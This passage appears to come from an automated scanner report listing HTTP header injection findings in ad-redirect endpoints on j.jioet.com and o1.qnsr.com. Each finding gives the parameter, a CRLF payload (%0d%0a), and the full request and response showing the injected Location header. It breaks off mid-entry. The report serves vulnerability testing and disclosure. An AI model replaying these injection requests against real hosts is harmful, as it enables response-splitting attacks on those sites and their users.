http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=a6faf d11408052f1&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=682110218044832619&&exp=y Content-Type: text/html; charset=iso-8859-1 Content-Length: 1124
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Found</TITLE> </HEAD><BODY> <H1>Found</H1> The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110 ...[SNIP]...
The value of the segid request parameter is copied into the Location response header. The payload 7302f%0d%0a96d19307f57 was submitted in the segid parameter. This caused a response containing an injected HTTP header.
Request
GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=7302f%0d%0a96d19307f57&sdw=vendorseek.com&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=true& HTTP/1.1 Host: j.jioet.com Proxy-Connection: keep-alive Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Fri, 18 Feb 2011 12:48:29 GMT Server: QUAD 3G Set-Cookie: QIDA=TV5qnQqABU0AAARjeww; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:48:29 GMT Connection: close Pragma: no-cache Cache-Control: private, max-age=0, no-cache Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:48:29 GMT; DOMAIN=.jioet.com Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk122110218044829024ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:29 GMT; DOMAIN=.jioet.com P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Location: http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=7302f 96d19307f57&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=122110218044829024&&exp=y Content-Type: text/html; charset=iso-8859-1 Content-Length: 1138
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Found</TITLE> </HEAD><BODY> <H1>Found</H1> The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110 ...[SNIP]...
The value of the sp request parameter is copied into the Location response header. The payload c97c6%0d%0af89b2e971c3 was submitted in the sp parameter. This caused a response containing an injected HTTP header.
Request
GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=c97c6%0d%0af89b2e971c3&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=true& HTTP/1.1 Host: j.jioet.com Proxy-Connection: keep-alive Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Fri, 18 Feb 2011 12:48:37 GMT Server: QUAD 3G Set-Cookie: QIDA=TV5qpQqABU0AAFtCp4E; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:48:37 GMT Connection: close Pragma: no-cache Cache-Control: private, max-age=0, no-cache Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:48:37 GMT; DOMAIN=.jioet.com Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk734110218044837517ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:37 GMT; DOMAIN=.jioet.com P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Location: http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=c97c6 f89b2e971c3&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=734110218044837517&&exp=y Content-Type: text/html; charset=iso-8859-1 Content-Length: 1134
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Found</TITLE> </HEAD><BODY> <H1>Found</H1> The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110 ...[SNIP]...
The value of the spage request parameter is copied into the Location response header. The payload ac9b5%0d%0a7aa82c9df45 was submitted in the spage parameter. This caused a response containing an injected HTTP header.
Request
GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=ac9b5%0d%0a7aa82c9df45&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=true& HTTP/1.1 Host: j.jioet.com Proxy-Connection: keep-alive Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Fri, 18 Feb 2011 12:48:14 GMT Server: QUAD 3G Set-Cookie: QIDA=TV5qjgqABU0AAASGvC4; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:48:14 GMT Connection: close Pragma: no-cache Cache-Control: private, max-age=0, no-cache Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:48:14 GMT; DOMAIN=.jioet.com Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk902110218044814004ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:14 GMT; DOMAIN=.jioet.com P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Location: http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=ac9b5 7aa82c9df45&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=902110218044814004&&exp=y Content-Type: text/html; charset=iso-8859-1 Content-Length: 1138
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Found</TITLE> </HEAD><BODY> <H1>Found</H1> The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110 ...[SNIP]...
The value of the tnum request parameter is copied into the Location response header. The payload 87307%0d%0a1ff0f4663d8 was submitted in the tnum parameter. This caused a response containing an injected HTTP header.
Request
GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=87307%0d%0a1ff0f4663d8&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=true& HTTP/1.1 Host: j.jioet.com Proxy-Connection: keep-alive Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Fri, 18 Feb 2011 12:47:41 GMT Server: QUAD 3G Set-Cookie: QIDA=TV5qbQqABU0AAHAbVFY; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:47:41 GMT Connection: close Pragma: no-cache Cache-Control: private, max-age=0, no-cache Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:47:41 GMT; DOMAIN=.jioet.com Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk153110218044741583ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:47:41 GMT; DOMAIN=.jioet.com P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Location: http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=87307 1ff0f4663d8&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=153110218044741583&&exp=y Content-Type: text/html; charset=iso-8859-1 Content-Length: 1137
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Found</TITLE> </HEAD><BODY> <H1>Found</H1> The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110 ...[SNIP]...
The value of the typage request parameter is copied into the Location response header. The payload 30b9d%0d%0ad888947672d was submitted in the typage parameter. This caused a response containing an injected HTTP header.
Request
GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=30b9d%0d%0ad888947672d&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=true& HTTP/1.1 Host: j.jioet.com Proxy-Connection: keep-alive Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Fri, 18 Feb 2011 12:48:11 GMT Server: QUAD 3G Set-Cookie: QIDA=TV5qiwqABU0AAFs3VGE; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:48:11 GMT Connection: close Pragma: no-cache Cache-Control: private, max-age=0, no-cache Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:48:11 GMT; DOMAIN=.jioet.com Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk104110218044811833ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:11 GMT; DOMAIN=.jioet.com P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Location: http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=30b9d d888947672d&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=104110218044811833&&exp=y Content-Type: text/html; charset=iso-8859-1 Content-Length: 1097
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Found</TITLE> </HEAD><BODY> <H1>Found</H1> The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110 ...[SNIP]...
The value of the vkey request parameter is copied into the Location response header. The payload 23e2a%0d%0a3f19f058323 was submitted in the vkey parameter. This caused a response containing an injected HTTP header.
Request
GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=23e2a%0d%0a3f19f058323&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=true& HTTP/1.1 Host: j.jioet.com Proxy-Connection: keep-alive Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Fri, 18 Feb 2011 12:48:05 GMT Server: QUAD 3G Set-Cookie: QIDA=TV5qhQqABU0AAEaLWAM; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:48:05 GMT Connection: close Pragma: no-cache Cache-Control: private, max-age=0, no-cache Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:48:05 GMT; DOMAIN=.jioet.com Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk426110218044805062ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:05 GMT; DOMAIN=.jioet.com P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Location: http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=23e2a 3f19f058323&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=426110218044805062&&exp=y Content-Type: text/html; charset=iso-8859-1 Content-Length: 1138
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Found</TITLE> </HEAD><BODY> <H1>Found</H1> The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110 ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 2ba49%0d%0af6db1a0359b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of the a request parameter is copied into the Location response header. The payload 1dcd0%0d%0a41e1a72565e was submitted in the a parameter. This caused a response containing an injected HTTP header.
Request
GET //cgi/c?a=20127048;x=3584;c=203695854,203695854;i=0;n=203;s=9544;p=20830501;;;y=http://www.thelist.com/;;e=i;s=9544;g=254;w=0;m=0;z=1412312582;k=http://solutions.internet.com/5146_cloud-ssoban1dcd0%0d%0a41e1a72565e HTTP/1.1 Host: o1.qnsr.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508
Response
HTTP/1.1 302 Found Date: Fri, 18 Feb 2011 12:47:22 GMT Server: QUAD 3G Connection: close Pragma: no-cache Cache-Control: private, max-age=0, no-cache Location: http://solutions.internet.com/5146_cloud-ssoban1dcd0 41e1a72565e?&CCID=20127048203695854&QTR=ZZf0Za20127048Zb0Zg172Zw56Zm0Zc203695854,203695854Zs9544ZZ&CLK=734110218044722769 Content-Type: text/html; charset=iso-8859-1 Content-Length: 431
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Found</TITLE> </HEAD><BODY> <H1>Found</H1> The document has moved <A HREF="http://solutions.internet.com/5146_cloud-ssoban1dc ...[SNIP]...
2.22. http://o1.qnsr.com//cgi/c [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://o1.qnsr.com
Path:
//cgi/c
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 523ba%0d%0a01f8f6d3fe5 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET //cgi/c?a=20127048;x=3584;c=203695854,203695854;i=0;n=203;s=9544;p=20830501;;;y=http://www.thelist.com/;;e=i;s=9544;g=254;w=0;m=0;z=1412312582;k=http://solutions.internet.com/5146_cloud-ssoban&523ba%0d%0a01f8f6d3fe5=1 HTTP/1.1 Host: o1.qnsr.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508
Response
HTTP/1.1 302 Found Date: Fri, 18 Feb 2011 12:47:32 GMT Server: QUAD 3G Connection: close Pragma: no-cache Cache-Control: private, max-age=0, no-cache Location: http://solutions.internet.com/5146_cloud-ssoban&523ba 01f8f6d3fe5=1?&CCID=20127048203695854&QTR=ZZf0Za20127048Zb0Zg172Zw56Zm0Zc203695854,203695854Zs9544ZZ&CLK=723110218044732893 Content-Type: text/html; charset=iso-8859-1 Content-Length: 438
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Found</TITLE> </HEAD><BODY> <H1>Found</H1> The document has moved <A HREF="http://solutions.internet.com/5146_cloud-ssoban&am ...[SNIP]...
The value of the &exp request parameter is copied into the Location response header. The payload ddacd%0d%0a54f1c4d6f1f was submitted in the &exp parameter. This caused a response containing an injected HTTP header.
Request
